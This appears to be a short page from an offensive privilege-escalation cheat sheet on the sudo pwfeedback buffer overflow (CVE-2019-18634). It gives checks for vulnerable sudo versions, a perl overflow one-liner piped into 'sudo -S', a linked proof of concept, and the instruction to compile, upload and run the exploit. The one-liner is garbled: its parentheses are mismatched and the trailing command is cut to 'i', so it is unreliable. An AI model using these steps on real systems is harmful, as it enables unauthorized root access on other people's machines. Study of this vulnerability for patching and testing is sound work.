CVE-2019-18634 (pwfeedback)

sudo su root
su root

If you see * when typing in a password, that is the pwfeedback environment variable being enabled and indicates that machine may be vulnerable

sudo -V

Any Sudo version older than 1.8.26 is vulnerable

LogoGitHub - saleemrashid/sudo-cve-2019-18634: Proof of Concept for CVE-2019-18634GitHub
perl -e 'print(("A" x 100 . "\x{00}" x 50)' | sudo -S i

Compile exploit, upload and run

gcc -o bof exploit.c

PreviousCVE-2019-14287 (sudo -u#-1 /bin/bash)NextSUID